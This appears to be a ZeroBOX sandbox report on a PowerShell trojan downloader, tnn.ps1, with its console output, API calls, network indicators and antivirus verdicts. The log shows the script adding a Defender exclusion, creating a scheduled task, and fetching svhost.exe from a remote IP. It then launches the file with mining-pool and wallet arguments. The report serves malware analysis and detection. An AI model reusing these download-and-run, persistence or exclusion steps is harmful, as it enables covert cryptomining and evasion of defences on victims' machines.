popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

tnn.ps1

Generic Malware Antivirus UPX PE64 PE File OS Processor Check
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Jan. 10, 2025, 11:58 a.m. Jan. 10, 2025, 12:02 p.m.
Size 15.3KB
Type ASCII text
MD5 09f0fba23eae6e1f13662796cca68e88
SHA256 9a96719aa017ae54fb3b787344b26e383be1d7412cfcc0c0c1ee9b59d2949364
CRC32 CAE0BED8
ssdeep 192:+xtIF8/3VtJF+qFoYu1F6pCK4yi9Rk2Tubv5kXspVN0gKIywMcsl3xtIv8/3VjbU:+xtLJF+qSp1VhKBMxt++I1wrm6h+
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
spr.tw-pool.com
A 35.206.217.175
35.206.217.175
IP Address Status Action
151.106.34.115 Active Moloch
154.59.110.182 Active Moloch
164.124.101.2 Active Moloch
35.206.217.175 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Running with administrative privileges.
console_handle: 0x0000001f
1 1 0

WriteConsoleW

 buffer: Adding exclusion for 'C:\Users\test22\AppData\Local\Temp\svhost.exe'...
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: Failed to add exclusion. Error: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: Failed to add exclusion.
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: Starting S-T execution.
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: Error: Failed to create scheduled task. The term 'Get-ScheduledTask' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
console_handle: 0x00000063
1 1 0

WriteConsoleW

 buffer: Scheduled task creation failed.
console_handle: 0x0000006f
1 1 0

WriteConsoleW

 buffer: Scheduled task 'DownloadAndRunProgramTask' does not exist or is disabled.
console_handle: 0x0000007b
1 1 0

WriteConsoleW

 buffer: Scheduled task verification failed.
console_handle: 0x00000087
1 1 0

WriteConsoleW

 buffer: S-T execution completed.
console_handle: 0x00000097
1 1 0

WriteConsoleW

 buffer: Checking for processes using excessive CPU...
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: Get-Counter : The data in one of the performance counter samples is not valid.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: View the Status property for each PerformanceCounterSample object to make sure
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: it contains valid data.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\tnn.ps1:58 char:32
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $cpuUsage = Get-Counter <<<< '\Process(*)\% Processor Time' | Select
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: -Object -ExpandProperty CounterSamples
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidResult: (:) [Get-Counter], Exception
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CounterApiError,Microsoft.PowerShell.Commands.Ge
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: tCounterCommand
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: Failed to terminate process pw (PID: ). Error: Cannot bind parameter 'Id'. Cannot convert value "pw" to type "System.Int32". Error: "Input string was not in a correct format."
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: Verifying if program 'svhost.exe' is running...
console_handle: 0x0000002b
1 1 0

WriteConsoleW

 buffer: Error occurred while checking for program: Cannot find a process with the name "svhost". Verify the process name and call the cmdlet again.
console_handle: 0x00000037
1 1 0

WriteConsoleW

 buffer: Program is not running. Repeating the process...
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: Downloading program from http://151.106.34.115:6573/svhost.exe...
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: Failed to download using Invoke-WebRequest. Falling back to .NET WebClient.
console_handle: 0x00000067
1 1 0

WriteConsoleW

 buffer: Executing program: svhost.exe
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: Program 'svhost.exe' executed successfully.
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: Sleeping before the next check...
console_handle: 0x00000093
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025df000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05430000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06060000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05431000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05432000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05433000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05434000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05435000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05450000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05436000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05256000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05437000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05241000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061be000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061bf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05438000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05439000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02842000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02843000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05451000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0543a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0543b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0543c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0543d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\svhost.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\svhost.exe
parameters: -d spr.tw-pool.com:14001 -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL
filepath: C:\Users\test22\AppData\Local\Temp\svhost.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received Aƒø„ƒóo¶àfoþfoîfüþfqÖfüÿfqÕfÛñfüÿfÛèfüÿfüÿfoÏfëïfüÏfüÉfëÎfïÍfDoÁfüÉfüÉfAqÐfüÉfDÛÀfüÉfüÉfAëÈfAïÊŽàE‰ÖAƒæðAƒâF,3„èÿÿMcåB¶¼%‰ø@ÐÏÀÈ1ÇAE@ÀÏ÷×Bˆ¼%A9ÇŽéçÿÿH˜¶œ‰ÙÐËÀÉ1ËÀË÷ӈœAEA9ÇŽ½çÿÿH˜¶”A‰ÒÐÊAÀÊD1ÒÀÊ÷҈”AEA9ÇŽŽçÿÿH˜D¶ŒE‰ÈAÐÉAÀÈE1ÁAÀÉA÷ÑDˆŒAEA9ÇŽZçÿÿH˜D¶œD‰ÞAÐË@ÀÎA1óAÀËA÷ÓDˆœAEA9ÇŽ&çÿÿH˜D¶´E‰ôAÐÎAÀÌE1æAÀÎA÷ÖDˆ´AEA9ÇŽòæÿÿH˜¶¼‰û@ÐÏÀË1ß@ÀÏ÷×@ˆ¼AEA9ÇŽÃæÿÿH˜¶Œ‰ÊÐÉÀÊ1ÑÀÉ÷шŒAEA9ÇŽ—æÿÿH˜D¶”E‰ÑAÐÊAÀÉE1ÊAÀÊA÷ÒDˆ”AE A9ÇŽcæÿÿH˜D¶œE‰ØAÐËAÀÈE1ÃAÀËA÷ÓDˆœAE A9ÇŽ/æÿÿH˜¶´A‰ö@ÐÎAÀÎD1ö@ÀÎ÷Ö@ˆ´AE A9ÇŽýåÿÿH˜D¶¤D‰çAÐÌ@ÀÏA1üAÀÌA÷ÔDˆ¤AE A9ÇŽÉåÿÿH˜¶œ‰ÙÐËÀÉ1ËÀË÷ӈœAE A9ÇŽåÿÿH˜¶”A‰ÒÐÊAÀÊD1ÒÀÊ÷҈”AEA9ÇŽnåÿÿH˜¶œ‰ÙÐËÀÉ1ËÀË÷ӈœéJåÿÿD9ûAåÿÿD¶ëEÿN\-A)ßJl-ND=M‰ÁM)ÙAƒát}IƒùtKIƒùt"A¶³IƒÃ 6ÐÁ¶ÑƒáÓúÒAˆ“E¶³IƒÃC 6ÐÁ¶ÑƒáÓúÒAˆ“E¶£IƒÃC $ÐÁ¶ÑƒáÓúÒAˆ“M9ÄžäÿÿA¶»E¶“IƒÃE¶«E¶‹ ?ÐÁ¶ÑƒáÓúC ÐÁÒ¶ÁƒáAˆ“ ÓøCL-ÐÁ‰Ã¶éƒáÛÓýC Aˆ› ÐÁA‰ï¶ñƒáEÿÓþEˆ»A‰öEöEˆ³M9Ã…mÿÿÿéäÿÿD9ûýãÿÿD¶ÛAÿND)ßNdM8L‰ÒL)âƒâ„¢HƒútdHƒút/A¶„$IƒÄ‰Ãƒóa)؉ÁÀÈÐÉ1ȶЃà‰ÁÓúAˆ”$A¶„$IƒÄ‰Ãƒóa)؉ÁÀÈÐÉ1ȶЃà‰ÁÓúAˆ”$A¶„$IƒÄ‰Ãƒóa)؉ÁÀÈÐÉ1ȶЃà‰ÁÓúAˆ”$M9â„4ãÿÿA¶„$IƒÄ‰Ãƒóa)؉ÁÀÈÐÉ1ȶЃà‰ÁÓúA¶Œ$ Aˆ”$ A‰ÍAƒõaD)é‰ÍÀÉ@ÐÍ1éD¶ùƒáAÓÿA¶Œ$Eˆ¼$ ‰Îƒöa)ñA‰ÎÀÉAÐÎD1ñD¶ÙƒáAÓûA¶Œ$Eˆœ$‰Ïƒ÷a)ù‰ÈÀÉÐÈ1Á¶ÙƒáÓûAˆœ$M9â…BÿÿÿéqâÿÿD9ûhâÿÿE‰üA)ÜET$ÿAƒú'†CD¶ëfEväfïÿD‰æÁîfEïÛNŒ-óDo ÙïTHÁæóo -ðTóDo5äïTóDo- ðTóo#ðTLÎóAoIƒÁfAïÔfoâfDoÒfDüÒfqÔfAÛæfEüÒfDëÔfAïÒfoâfAhÓfA`ãfoÚfi×foìfiçfaßfaïfoõfbõfjífôñfôéfÛðfÛèfDoÆfAsðfDÔÆfEoÐfAsòfEÔÂfAsðfAÔðfsÖ fDoÆfoõfsöfÔõfDoÖfAsòfAÔòfsöfÔîfAoðfsÕ ÆõˆfoìfbìfjäfôéfôáfÛèfÛàfDoÅfAsðfDÔÅfEoÐfAsòfEÔÂfAsðfAÔèfsÕ fDoÅfoìfsõfÔìfDoÕfAsòfAÔêfDoÓfDbÓfsõfjÛfDôÑfôÙfÔåfsÔ foîDÆĈfAaðfAièfoæfaõfiåfDÛÐfÛØfaôfAoêfoãfAÛñfsõfsôfAÔêfÔãfDoÅfAsðfAÔèfsõfDÔÕfoìfsõfAsÒ fÔåfsôfÔÜfsÓ DÆӈfoÚfbÚfjÒfôÙfôÑfÛØfÛÐfoãfsôfÔãfDoÄfAsðfAÔàfEoÂfsôfÔÜfoëfoÚfsófsÕ fÔÚfoãfsôfÔÜfsófÔÓfAoÚfsÒ ÆêˆfaÝfDiÅfoÓfAaØfAiÐfaÚfAÛÙfgófDoÖfüöfüöfAqÒfüöfEÛÕfüöfüöfAëòAqðL9Î…$ýÿÿE‰æAƒæðAƒäF,3„ßÿÿIcýA¸ €H¹!B„H»D¶œ=I‰úHwI÷ÒD‰ØEúÀÀAƒâD1ضÐI¯ÐH!ÊH¯ÓHÁê Àʈ”=A9÷Ž«ÞÿÿE…Ò„³AƒútrAƒút6D¶¤5E‰åAÀÅE1åE¶ÍM¯ÈI!ÉL¯ËIÁé AÀÉDˆŒ5HwD¶´5D‰÷@ÀÇD1÷D¶×M¯ÐI!ÊL¯ÓIÁê AÀÊDˆ”5HƒÆD¶œ5D‰ØÀÀD1ضÐI¯ÐH!ÊH¯ÓHÁê Àʈ”5HƒÆA9÷ŽïÝÿÿD¶¤5D¶´5D¶œ5E‰åD‰÷AÀÅD‰Ø@ÀÇE1åÀÀD1÷D¶¤5E¶ÍD1ØD¶×M¯ÈE‰å¶ÐAÀÅM¯ÐE1åI¯ÐI!ÉL¯ËI!ÊH!ÊL¯ÓH¯ÓIÁé AÀÉIÁê DˆŒ5E¶ÍHÁê M¯ÈAÀÊÀÊDˆ”5ˆ”5I!ÉL¯ËIÁé AÀÉDˆŒ5HƒÆA9÷/ÿÿÿéÝÿÿD9ûÝÿÿD¶ÃEÿJtA)ßJlNt=L‰ñH)ñƒá„‡HƒùtRHƒùt&¶†HƒÆ‰ÃÀÈÐË1öËèþ÷=1ØÐÀˆ†¶ŽHƒÆ‰ËÀÉÐË1˶ËèØ÷=1ØÐÀˆ†¶†HƒÆ‰ÃÀÈÐË1öËè²÷=1ØÐÀˆ†I9ö„`Üÿÿ¶ŽHƒÆ‰ËÀÉÐË1˶Ëèƒ÷=1ØÐÀˆ† ¶† ‰ÂÀÈÐÊ1¶ÊH‰Ïè^÷=¶Ž1øÐÀ‰ËÀɈ† ÐË1˶ËI‰Ìè9÷=D1àÐÀˆ†¶†‰ÂÀÈÐÊ1¶ÊI‰Íè÷=D1èÐÀˆ†I9ö…`ÿÿÿé»ÛÿÿD9û²ÛÿÿE‰þD¶ÃA)ÞEVÿAƒúv2MˆA¶ÿE‰óK4 HH9ÎŽÌøHÇL9ÏŽ¼øF¶¤L‰ÁIcßMPH÷ÑAÁäDùD‰àƒáƒðaA)ÄFˆ¤D2¤Fˆ¤
Data sent GET /svhost.exe HTTP/1.1 Host: 151.106.34.115:6573 Connection: Keep-Alive
host 151.106.34.115
host 154.59.110.182
file C:\Users\test22\AppData\Local\Temp\svhost.exe
CTX powershell.trojan.generic
VIPRE Heur.BZC.PZQ.Boxter.928.D6331F74
Arcabit Heur.BZC.PZQ.Boxter.928.D6331F74
BitDefender Heur.BZC.PZQ.Boxter.928.D6331F74
MicroWorld-eScan Heur.BZC.PZQ.Boxter.928.D6331F74
Emsisoft Heur.BZC.PZQ.Boxter.928.D6331F74 (B)
Ikarus Trojan.PowerShell.Crypt
FireEye Heur.BZC.PZQ.Boxter.928.D6331F74
Google Detected
Kingsoft Script.Ks.Malware.1747
Microsoft Trojan:Win32/Vigorf.A
GData Heur.BZC.PZQ.Boxter.928.D6331F74
huorong TrojanDownloader/PS.NetLoader.hc
Time & API Arguments Status Return Repeated

send

 buffer: GET /svhost.exe HTTP/1.1 Host: 151.106.34.115:6573 Connection: Keep-Alive
socket: 1800
sent: 79
1 79 0
